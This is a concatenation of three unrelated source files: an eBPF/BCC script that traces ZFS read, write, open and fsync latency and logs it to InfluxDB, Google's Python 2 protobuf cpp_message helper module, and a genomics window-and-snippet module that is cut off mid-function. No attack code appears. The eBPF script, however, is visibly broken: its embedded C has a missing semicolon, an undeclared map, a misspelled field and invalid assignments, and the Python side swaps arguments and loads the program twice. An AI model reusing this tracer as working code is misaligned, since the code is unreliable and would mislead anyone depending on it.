label = "msecs"
else:
factor = 1000
label = "usecs"
if args.interval and int(args.interval) == 0:
print("ERROR: interval 0. Exiting.")
exit()
debug = 0
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/fs.h>
#include <linux/sched.h>
#define OP_NAME_LEN 8
typedef struct dist_key {
char op[OP_NAME_LEN];
u64 slot;
u32 pid
char comm[TASK_COMM_LEN];
} dist_key_t;
BPF_HASH(start, u32);
BPF_PERF_OUTPUT(events);
// time operation
int trace_entry(struct pt_regs *ctx)
{
u64 pid_tgid = bpf_get_current_pid_tgid();
u32 pid = pid_tgid >> 32;
u32 tid = (u32)pid_tgid;
if (FILTER_PID)
return 0;
u64 ts = bpf_ktime_get_ns();
start.update(&tid, &ts);
return 0;
}
static int trace_return(struct pt_regs *ctx, const char *op)
{
struct dist_key data1={};
u64 *tsp;
u64 pid_tgid = bpf_get_current_pid_tgid();
u32 pid = pid_tgid >> 32;
u32 tid = (u32)pid_tgid;
// fetch timestamp and calculate delta
tsp = start.lookup(&tid);
if (tsp == 0) {
return 0; // missed start or filtered
}
u64 delta = (bpf_ktime_get_ns() - *tsp) / FACTOR;
// store as histogram
dist_key_t key = {.slot = bpf_log2l(delta)};
__builtin_memcpy(&key.op, op, sizeof(key.op));
dist.atomic_increment(key);
start.delete(&tid);
data1.pid=pid;
data1.comm=bpf_get_current_comm(&comm, sizeof(comm));
data1.solt=key;
data1.op=op;
events.perf_submit(ctx, &data, sizeof(data));
return 0;
}
int trace_read_return(struct pt_regs *ctx)
{
char *op = "read";
return trace_return(ctx, op);
}
int trace_write_return(struct pt_regs *ctx)
{
char *op = "write";
return trace_return(ctx, op);
}
int trace_open_return(struct pt_regs *ctx)
{
char *op = "open";
return trace_return(ctx, op);
}
int trace_fsync_return(struct pt_regs *ctx)
{
char *op = "fsync";
return trace_return(ctx, op);
}
"""
# data structure from template
class lmp_data(object):
def __init__(self,a,b,c,d,e,f):
self.time = a
self.glob = b
self.pid = c
self.comm = d
self.op = e
self.slot = f
data_struct = {"measurement":'zfsdist',
"time":[],
"tags":['glob',],
"fields":['time','pid','comm','op','slot']}
bpf_text = bpf_text.replace('FACTOR', str(factor))
if args.pid:
bpf_text = bpf_text.replace('FILTER_PID', 'pid != %s' % pid)
else:
bpf_text = bpf_text.replace('FILTER_PID', '0')
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
# load BPF program
b = BPF(text=bpf_text)
# common file functions
if BPF.get_kprobe_functions(b'zpl_iter'):
b.attach_kprobe(event="zpl_iter_read", fn_name="trace_entry")
b.attach_kprobe(event="zpl_iter_write", fn_name="trace_entry")
elif BPF.get_kprobe_functions(b'zpl_aio'):
b.attach_kprobe(event="zpl_aio_read", fn_name="trace_entry")
b.attach_kprobe(event="zpl_aio_write", fn_name="trace_entry")
else:
b.attach_kprobe(event="zpl_read", fn_name="trace_entry")
b.attach_kprobe(event="zpl_write", fn_name="trace_entry")
b.attach_kprobe(event="zpl_open", fn_name="trace_entry")
b.attach_kprobe(event="zpl_fsync", fn_name="trace_entry")
if BPF.get_kprobe_functions(b'zpl_iter'):
b.attach_kretprobe(event="zpl_iter_read", fn_name="trace_read_return")
b.attach_kretprobe(event="zpl_iter_write", fn_name="trace_write_return")
elif BPF.get_kprobe_functions(b'zpl_aio'):
b.attach_kretprobe(event="zpl_aio_read", fn_name="trace_read_return")
b.attach_kretprobe(event="zpl_aio_write", fn_name="trace_write_return")
else:
b.attach_kretprobe(event="zpl_read", fn_name="trace_read_return")
b.attach_kretprobe(event="zpl_write", fn_name="trace_write_return")
b.attach_kretprobe(event="zpl_open", fn_name="trace_open_return")
b.attach_kretprobe(event="zpl_fsync", fn_name="trace_fsync_return")
print("Tracing ZFS operation latency... Hit Ctrl-C to end.")
# process event
def print_event(cpu, data, size):
event = b["events"].event(data)
test_data = lmp_data(datetime.now().isoformat(),'glob',event.pid,event.comm.decode('utf-8', 'replace'),event.solt, event.op)
write2db(data_struct, test_data, influx_client, DatabaseType.INFLUXDB.value)
# print(("%s Triggered by PID %d (\"%s\"), OOM kill of PID %d (\"%s\")"
# ", %d pages, loadavg: %s") % (strftime("%H:%M:%S"), event.fpid,
# event.fcomm.decode('utf-8', 'replace'), event.tpid,
# event.tcomm.decode('utf-8', 'replace'), event.pages, avgline))
# initialize BPF
b = BPF(text=bpf_text)
b["events"].open_perf_buffer(print_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains helper functions used to create protocol message classes from
Descriptor objects at runtime backed by the protocol buffer C++ API.
"""
__author__ = 'petar@google.com (Petar Petrov)'
import copy_reg
import operator
from google.protobuf.internal import _net_proto2___python
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import message
_LABEL_REPEATED = _net_proto2___python.LABEL_REPEATED
_LABEL_OPTIONAL = _net_proto2___python.LABEL_OPTIONAL
_CPPTYPE_MESSAGE = _net_proto2___python.CPPTYPE_MESSAGE
_TYPE_MESSAGE = _net_proto2___python.TYPE_MESSAGE
def GetDescriptorPool():
"""Creates a new DescriptorPool C++ object."""
return _net_proto2___python.NewCDescriptorPool()
_pool = GetDescriptorPool()
def GetFieldDescriptor(full_field_name):
"""Searches for a field descriptor given a full field name."""
return _pool.FindFieldByName(full_field_name)
def BuildFile(content):
"""Registers a new proto file in the underlying C++ descriptor pool."""
_net_proto2___python.BuildFile(content)
def GetExtensionDescriptor(full_extension_name):
"""Searches for extension descriptor given a full field name."""
return _pool.FindExtensionByName(full_extension_name)
def NewCMessage(full_message_name):
"""Creates a new C++ protocol message by its name."""
return _net_proto2___python.NewCMessage(full_message_name)
def ScalarProperty(cdescriptor):
"""Returns a scalar property for the given descriptor."""
def Getter(self):
return self._cmsg.GetScalar(cdescriptor)
def Setter(self, value):
self._cmsg.SetScalar(cdescriptor, value)
return property(Getter, Setter)
def CompositeProperty(cdescriptor, message_type):
"""Returns a Python property the given composite field."""
def Getter(self):
sub_message = self._composite_fields.get(cdescriptor.name, None)
if sub_message is None:
cmessage = self._cmsg.NewSubMessage(cdescriptor)
sub_message = message_type._concrete_class(__cmessage=cmessage)
self._composite_fields[cdescriptor.name] = sub_message
return sub_message
return property(Getter)
class RepeatedScalarContainer(object):
"""Container for repeated scalar fields."""
__slots__ = ['_message', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor):
self._message = msg
self._cmsg = msg._cmsg
self._cfield_descriptor = cfield_descriptor
def append(self, value):
self._cmsg.AddRepeatedScalar(
self._cfield_descriptor, value)
def extend(self, sequence):
for element in sequence:
self.append(element)
def insert(self, key, value):
values = self[slice(None, None, None)]
values.insert(key, value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def remove(self, value):
values = self[slice(None, None, None)]
values.remove(value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __setitem__(self, key, value):
values = self[slice(None, None, None)]
values[key] = value
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __getitem__(self, key):
return self._cmsg.GetRepeatedScalar(self._cfield_descriptor, key)
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(self._cfield_descriptor, key)
def __len__(self):
return len(self[slice(None, None, None)])
def __eq__(self, other):
if self is other:
return True
if not operator.isSequenceType(other):
raise TypeError(
'Can only compare repeated scalar fields against sequences.')
# We are presumably comparing against some other sequence type.
return other == self[slice(None, None, None)]
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, *args, **kwargs):
# Maintain compatibility with the previous interface.
if 'sort_function' in kwargs:
kwargs['cmp'] = kwargs.pop('sort_function')
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor,
sorted(self, *args, **kwargs))
def RepeatedScalarProperty(cdescriptor):
"""Returns a Python property the given repeated scalar field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedScalarContainer(self, cdescriptor)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class RepeatedCompositeContainer(object):
"""Container for repeated composite fields."""
__slots__ = ['_message', '_subclass', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor, subclass):
self._message = msg
self._cmsg = msg._cmsg
self._subclass = subclass
self._cfield_descriptor = cfield_descriptor
def add(self, **kwargs):
cmessage = self._cmsg.AddMessage(self._cfield_descriptor)
return self._subclass(__cmessage=cmessage, __owner=self._message, **kwargs)
def extend(self, elem_seq):
"""Extends by appending the given sequence of elements of the same type
as this one, copying each individual message.
"""
for message in elem_seq:
self.add().MergeFrom(message)
def remove(self, value):
# TODO(protocol-devel): This is inefficient as it needs to generate a
# message pointer for each message only to do index(). Move this to a C++
# extension function.
self.__delitem__(self[slice(None, None, None)].index(value))
def MergeFrom(self, other):
for message in other[:]:
self.add().MergeFrom(message)
def __getitem__(self, key):
cmessages = self._cmsg.GetRepeatedMessage(
self._cfield_descriptor, key)
subclass = self._subclass
if not isinstance(cmessages, list):
return subclass(__cmessage=cmessages, __owner=self._message)
return [subclass(__cmessage=m, __owner=self._message) for m in cmessages]
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(
self._cfield_descriptor, key)
def __len__(self):
return self._cmsg.FieldLength(self._cfield_descriptor)
def __eq__(self, other):
"""Compares the current instance with another one."""
if self is other:
return True
if not isinstance(other, self.__class__):
raise TypeError('Can only compare repeated composite fields against '
'other repeated composite fields.')
messages = self[slice(None, None, None)]
other_messages = other[slice(None, None, None)]
return messages == other_messages
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, cmp=None, key=None, reverse=False, **kwargs):
# Maintain compatibility with the old interface.
if cmp is None and 'sort_function' in kwargs:
cmp = kwargs.pop('sort_function')
# The cmp function, if provided, is passed the results of the key function,
# so we only need to wrap one of them.
if key is None:
index_key = self.__getitem__
else:
index_key = lambda i: key(self[i])
# Sort the list of current indexes by the underlying object.
indexes = range(len(self))
indexes.sort(cmp=cmp, key=index_key, reverse=reverse)
# Apply the transposition.
for dest, src in enumerate(indexes):
if dest == src:
continue
self._cmsg.SwapRepeatedFieldElements(self._cfield_descriptor, dest, src)
# Don't swap the same value twice.
indexes[src] = src
def RepeatedCompositeProperty(cdescriptor, message_type):
"""Returns a Python property for the given repeated composite field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedCompositeContainer(
self, cdescriptor, message_type._concrete_class)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class ExtensionDict(object):
"""Extension dictionary added to each protocol message."""
def __init__(self, msg):
self._message = msg
self._cmsg = msg._cmsg
self._values = {}
def __setitem__(self, extension, value):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_OPTIONAL or
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
raise TypeError('Extension %r is repeated and/or a composite type.' % (
extension.full_name,))
self._cmsg.SetScalar(cdescriptor, value)
self._values[extension] = value
def __getitem__(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type != _CPPTYPE_MESSAGE):
return self._cmsg.GetScalar(cdescriptor)
ext = self._values.get(extension, None)
if ext is not None:
return ext
ext = self._CreateNewHandle(extension)
self._values[extension] = ext
return ext
def ClearExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
self._cmsg.ClearFieldByDescriptor(extension._cdescriptor)
if extension in self._values:
del self._values[extension]
def HasExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
return self._cmsg.HasFieldByDescriptor(extension._cdescriptor)
def _FindExtensionByName(self, name):
"""Tries to find a known extension with the specified name.
Args:
name: Extension full name.
Returns:
Extension field descriptor.
"""
return self._message._extensions_by_name.get(name, None)
def _CreateNewHandle(self, extension):
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
cmessage = self._cmsg.NewSubMessage(cdescriptor)
return extension.message_type._concrete_class(__cmessage=cmessage)
if cdescriptor.label == _LABEL_REPEATED:
if cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
return RepeatedCompositeContainer(
self._message, cdescriptor, extension.message_type._concrete_class)
else:
return RepeatedScalarContainer(self._message, cdescriptor)
# This shouldn't happen!
assert False
return None
def NewMessage(bases, message_descriptor, dictionary):
"""Creates a new protocol message *class*."""
_AddClassAttributesForNestedExtensions(message_descriptor, dictionary)
_AddEnumValues(message_descriptor, dictionary)
_AddDescriptors(message_descriptor, dictionary)
return bases
def InitMessage(message_descriptor, cls):
"""Constructs a new message instance (called before instance's __init__)."""
cls._extensions_by_name = {}
_AddInitMethod(message_descriptor, cls)
_AddMessageMethods(message_descriptor, cls)
_AddPropertiesForExtensions(message_descriptor, cls)
copy_reg.pickle(cls, lambda obj: (cls, (), obj.__getstate__()))
def _AddDescriptors(message_descriptor, dictionary):
"""Sets up a new protocol message class dictionary.
Args:
message_descriptor: A Descriptor instance describing this message type.
dictionary: Class dictionary to which we'll add a '__slots__' entry.
"""
dictionary['__descriptors'] = {}
for field in message_descriptor.fields:
dictionary['__descriptors'][field.name] = GetFieldDescriptor(
field.full_name)
dictionary['__slots__'] = list(dictionary['__descriptors'].iterkeys()) + [
'_cmsg', '_owner', '_composite_fields', 'Extensions', '_HACK_REFCOUNTS']
def _AddEnumValues(message_descriptor, dictionary):
"""Sets class-level attributes for all enum fields defined in this message.
Args:
message_descriptor: Descriptor object for this message type.
dictionary: Class dictionary that should be populated.
"""
for enum_type in message_descriptor.enum_types:
dictionary[enum_type.name] = enum_type_wrapper.EnumTypeWrapper(enum_type)
for enum_value in enum_type.values:
dictionary[enum_value.name] = enum_value.number
def _AddClassAttributesForNestedExtensions(message_descriptor, dictionary):
"""Adds class attributes for the nested extensions."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in extension_dict.iteritems():
assert extension_name not in dictionary
dictionary[extension_name] = extension_field
def _AddInitMethod(message_descriptor, cls):
"""Adds an __init__ method to cls."""
# Create and attach message field properties to the message class.
# This can be done just once per message class, since property setters and
# getters are passed the message instance.
# This makes message instantiation extremely fast, and at the same time it
# doesn't require the creation of property objects for each message instance,
# which saves a lot of memory.
for field in message_descriptor.fields:
field_cdescriptor = cls.__descriptors[field.name]
if field.label == _LABEL_REPEATED:
if field.cpp_type == _CPPTYPE_MESSAGE:
value = RepeatedCompositeProperty(field_cdescriptor, field.message_type)
else:
value = RepeatedScalarProperty(field_cdescriptor)
elif field.cpp_type == _CPPTYPE_MESSAGE:
value = CompositeProperty(field_cdescriptor, field.message_type)
else:
value = ScalarProperty(field_cdescriptor)
setattr(cls, field.name, value)
# Attach a constant with the field number.
constant_name = field.name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, field.number)
def Init(self, **kwargs):
"""Message constructor."""
cmessage = kwargs.pop('__cmessage', None)
if cmessage:
self._cmsg = cmessage
else:
self._cmsg = NewCMessage(message_descriptor.full_name)
# Keep a reference to the owner, as the owner keeps a reference to the
# underlying protocol buffer message.
owner = kwargs.pop('__owner', None)
if owner:
self._owner = owner
if message_descriptor.is_extendable:
self.Extensions = ExtensionDict(self)
else:
# Reference counting in the C++ code is broken and depends on
# the Extensions reference to keep this object alive during unit
# tests (see b/4856052). Remove this once b/4945904 is fixed.
self._HACK_REFCOUNTS = self
self._composite_fields = {}
for field_name, field_value in kwargs.iteritems():
field_cdescriptor = self.__descriptors.get(field_name, None)
if not field_cdescriptor:
raise ValueError('Protocol message has no "%s" field.' % field_name)
if field_cdescriptor.label == _LABEL_REPEATED:
if field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
field_name = getattr(self, field_name)
for val in field_value:
field_name.add().MergeFrom(val)
else:
getattr(self, field_name).extend(field_value)
elif field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
getattr(self, field_name).MergeFrom(field_value)
else:
setattr(self, field_name, field_value)
Init.__module__ = None
Init.__doc__ = None
cls.__init__ = Init
def _IsMessageSetExtension(field):
"""Checks if a field is a message set extension."""
return (field.is_extension and
field.containing_type.has_options and
field.containing_type.GetOptions().message_set_wire_format and
field.type == _TYPE_MESSAGE and
field.message_type == field.extension_scope and
field.label == _LABEL_OPTIONAL)
def _AddMessageMethods(message_descriptor, cls):
"""Adds the methods to a protocol message class."""
if message_descriptor.is_extendable:
def ClearExtension(self, extension):
self.Extensions.ClearExtension(extension)
def HasExtension(self, extension):
return self.Extensions.HasExtension(extension)
def HasField(self, field_name):
return self._cmsg.HasField(field_name)
def ClearField(self, field_name):
child_cmessage = None
if field_name in self._composite_fields:
child_field = self._composite_fields[field_name]
del self._composite_fields[field_name]
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
child_cmessage = child_field._cmsg
if child_cmessage is not None:
self._cmsg.ClearField(field_name, child_cmessage)
else:
self._cmsg.ClearField(field_name)
def Clear(self):
cmessages_to_release = []
for field_name, child_field in self._composite_fields.iteritems():
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
cmessages_to_release.append((child_cdescriptor, child_field._cmsg))
self._composite_fields.clear()
self._cmsg.Clear(cmessages_to_release)
def IsInitialized(self, errors=None):
if self._cmsg.IsInitialized():
return True
if errors is not None:
errors.extend(self.FindInitializationErrors());
return False
def SerializeToString(self):
if not self.IsInitialized():
raise message.EncodeError(
'Message %s is missing required fields: %s' % (
self._cmsg.full_name, ','.join(self.FindInitializationErrors())))
return self._cmsg.SerializeToString()
def SerializePartialToString(self):
return self._cmsg.SerializePartialToString()
def ParseFromString(self, serialized):
self.Clear()
self.MergeFromString(serialized)
def MergeFromString(self, serialized):
byte_size = self._cmsg.MergeFromString(serialized)
if byte_size < 0:
raise message.DecodeError('Unable to merge from string.')
return byte_size
def MergeFrom(self, msg):
if not isinstance(msg, cls):
raise TypeError(
"Parameter to MergeFrom() must be instance of same class: "
"expected %s got %s." % (cls.__name__, type(msg).__name__))
self._cmsg.MergeFrom(msg._cmsg)
def CopyFrom(self, msg):
self._cmsg.CopyFrom(msg._cmsg)
def ByteSize(self):
return self._cmsg.ByteSize()
def SetInParent(self):
return self._cmsg.SetInParent()
def ListFields(self):
all_fields = []
field_list = self._cmsg.ListFields()
fields_by_name = cls.DESCRIPTOR.fields_by_name
for is_extension, field_name in field_list:
if is_extension:
extension = cls._extensions_by_name[field_name]
all_fields.append((extension, self.Extensions[extension]))
else:
field_descriptor = fields_by_name[field_name]
all_fields.append(
(field_descriptor, getattr(self, field_name)))
all_fields.sort(key=lambda item: item[0].number)
return all_fields
def FindInitializationErrors(self):
return self._cmsg.FindInitializationErrors()
def __str__(self):
return str(self._cmsg)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, self.__class__):
return False
return self.ListFields() == other.ListFields()
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def __unicode__(self):
# Lazy import to prevent circular import when text_format imports this file.
from google.protobuf import text_format
return text_format.MessageToString(self, as_utf8=True).decode('utf-8')
# Attach the local methods to the message class.
for key, value in locals().copy().iteritems():
if key not in ('key', 'value', '__builtins__', '__name__', '__doc__'):
setattr(cls, key, value)
# Static methods:
def RegisterExtension(extension_handle):
extension_handle.containing_type = cls.DESCRIPTOR
cls._extensions_by_name[extension_handle.full_name] = extension_handle
if _IsMessageSetExtension(extension_handle):
# MessageSet extension. Also register under type name.
cls._extensions_by_name[
extension_handle.message_type.full_name] = extension_handle
cls.RegisterExtension = staticmethod(RegisterExtension)
def FromString(string):
msg = cls()
msg.MergeFromString(string)
return msg
cls.FromString = staticmethod(FromString)
def _AddPropertiesForExtensions(message_descriptor, cls):
"""Adds properties for all fields in this protocol message type."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in extension_dict.iteritems():
constant_name = extension_name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, extension_field.number)
|
from functools import partial
import warnings
import numpy as np
import pandas as pd
import bioframe
from .lib.numutils import LazyToeplitz
def make_bin_aligned_windows(
binsize, chroms, centers_bp, flank_bp=0, region_start_bp=0, ignore_index=False
):
"""
Convert genomic loci into bin spans on a fixed bin-size segmentation of a
genomic region. Window limits are adjusted to align with bin edges.
Parameters
-----------
binsize : int
Bin size (resolution) in base pairs.
chroms : 1D array-like
Column of chromosome names.
centers_bp : 1D or nx2 array-like
If 1D, center points of each window. If 2D, the starts and ends.
flank_bp : int
Distance in base pairs to extend windows on either side.
region_start_bp : int, optional
If region is a subset of a chromosome, shift coordinates by this amount.
Default is 0.
Returns
-------
DataFrame with columns:
'chrom' - chromosome
'start', 'end' - window limits in base pairs
'lo', 'hi' - window limits in bins
"""
if not (flank_bp % binsize == 0):
raise ValueError("Flanking distance must be divisible by the bin size.")
if isinstance(chroms, pd.Series) and not ignore_index:
index = chroms.index
else:
index = None
chroms = np.asarray(chroms)
centers_bp = np.asarray(centers_bp)
if len(centers_bp.shape) == 2:
left_bp = centers_bp[:, 0]
right_bp = centers_bp[:, 1]
else:
left_bp = right_bp = centers_bp
if np.any(left_bp > right_bp):
raise ValueError("Found interval with end > start.")
left = left_bp - region_start_bp
right = right_bp - region_start_bp
left_bin = (left / binsize).astype(int)
right_bin = (right / binsize).astype(int)
flank_bin = flank_bp // binsize
lo = left_bin - flank_bin
hi = right_bin + flank_bin + 1
windows = pd.DataFrame(index=index)
windows["chrom"] = chroms
windows["start"] = lo * binsize
windows["end"] = hi * binsize
windows["lo"] = lo
windows["hi"] = hi
return windows
def assign_regions(features, supports):
"""
"""
features = features.copy()
# on-diagonal features
if "chrom" in features.columns:
for i, region in enumerate(supports):
if len(region) == 3:
sel = features.chrom == region[0]
sel &= features.end >= region[1]
if region[2] is not None:
sel &= features.start < region[2]
features.loc[sel, "region"] = i
elif len(region) == 2:
region1, region2 = region
sel1 = features.chrom == region1[0]
sel1 &= features.end >= region1[1]
if region1[2] is not None:
sel1 &= features.start < region1[2]
sel2 = features.chrom == region2[0]
sel2 &= features.end >= region2[1]
if region2[2] is not None:
sel2 &= features.start < region2[2]
features.loc[(sel1 | sel2), "region"] = i
# off-diagonal features
elif "chrom1" in features.columns:
for i, region in enumerate(supports):
if len(region) == 3:
region1, region2 = region, region
elif len(region) == 2:
region1, region2 = region[0], region[1]
sel1 = features.chrom1 == region1[0]
sel1 &= features.end1 >= region1[1]
if region1[2] is not None:
sel1 &= features.start1 < region1[2]
sel2 = features.chrom2 == region2[0]
sel2 &= features.end2 >= region2[1]
if region2[2] is not None:
sel2 &= features.start2 < region2[2]
features.loc[(sel1 | sel2), "region"] = i
else:
raise ValueError("Could not parse `features` data frame.")
features["region"] = features["region"].map(
lambda i: "{}:{}-{}".format(*supports[int(i)]), na_action="ignore"
)
return features
def _pileup(data_select, data_snip, arg):
support, feature_group = arg
# check if support region is on- or off-diagonal
if len(support) == 2:
region1, region2 = map(bioframe.region.parse_region_string, support)
else:
region1 = region2 = bioframe.region.parse_region_string(support)
# check if features are on- or off-diagonal
if "start" in feature_group:
s1 = feature_group["start"].values
e1 = feature_group["end"].values
s2, e2 = s1, e1
else:
s1 = feature_group["start1"].values
e1 = feature_group["end1"].values
s2 = feature_group["start2"].values
e2 = feature_group["end2"].values
data = data_select(region1, region2)
stack = list(map(partial(data_snip, data, region1, region2), zip(s1, e1, s2, e2)))
return np.dstack(stack), feature_group["_rank"].values
def pileup(features, data_select, data_snip, map=map):
"""
Handles on-diagonal and off-diagonal cases.
Parameters
----------
features : DataFrame
Table of features. Requires columns ['chrom', 'start', 'end'].
Or ['chrom1', 'start1', 'end1', 'chrom1', 'start2', 'end2'].
start, end are bp coordinates.
lo, hi are bin coordinates.
data_select : callable
Callable that takes a region as argument and returns
the data, mask and bin offset of a support region
data_snip : callable
Callable that takes data, mask and a 2D bin span (lo1, hi1, lo2, hi2)
and returns a snippet from the selected support region
"""
if features.region.isnull().any():
warnings.warn("Some features do not have regions assigned! Some snips will be empty.")
features = features.copy()
features["_rank"] = range(len(features))
# cumul_stack = []
# orig_rank = []
cumul_stack, orig_rank = zip(
*map(
partial(_pileup, data_select, data_snip),
features.groupby("region", sort=False),
)
)
# Restore the original rank of the input features
cumul_stack = np.dstack(cumul_stack)
orig_rank = np.concatenate(orig_rank)
idx = np.argsort(orig_rank)
cumul_stack = cumul_stack[:, :, idx]
return cumul_stack
def pair_sites(sites, separation, slop):
"""
Create "hand" intervals to the right and to the left of each site.
Then join right hands with left hands to pair sites together.
"""
from bioframe.tools import tsv, bedtools
mids = (sites["start"] + sites["end"]) // 2
left_hand = sites[["chrom"]].copy()
left_hand["start"] = mids - separation - slop
left_hand["end"] = mids - separation + slop
left_hand["site_id"] = left_hand.index
left_hand["direction"] = "L"
left_hand["snip_mid"] = mids
left_hand["snip_strand"] = sites["strand"]
right_hand = sites[["chrom"]].copy()
right_hand["start"] = mids + separation - slop
right_hand["end"] = mids + separation + slop
right_hand["site_id"] = right_hand.index
right_hand["direction"] = "R"
right_hand["snip_mid"] = mids
right_hand["snip_strand"] = sites["strand"]
# ignore out-of-bounds hands
mask = (left_hand["start"] > 0) & (right_hand["start"] > 0)
left_hand = left_hand[mask].copy()
right_hand = right_hand[mask].copy()
# intersect right hands (left anchor site)
# with left hands (right anchor site)
with tsv(right_hand) as R, tsv(left_hand) as L:
out = bedtools.intersect(a=R.name, b=L.name, wa=True, wb=True)
out.columns = [c + "_r" for c in right_hand.columns] + [
c + "_l" for c in left_hand.columns
]
return out
class CoolerSnipper:
def __init__(self, clr, cooler_opts=None):
self.clr = clr
self.binsize = self.clr.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault("sparse", True)
def select(self, region1, region2):
self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
self._isnan1 = np.isnan(self.clr.bins()["weight"].fetch(region1).values)
self._isnan2 = np.isnan(self.clr.bins()["weight"].fetch(region2).values)
matrix = self.clr.matrix(**self.cooler_opts).fetch(region1, region2)
if self.cooler_opts["sparse"]:
matrix = matrix.tocsr()
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
snippet = np.full((dm, dn), np.nan)
# snippet[pad_bottom:pad_top,
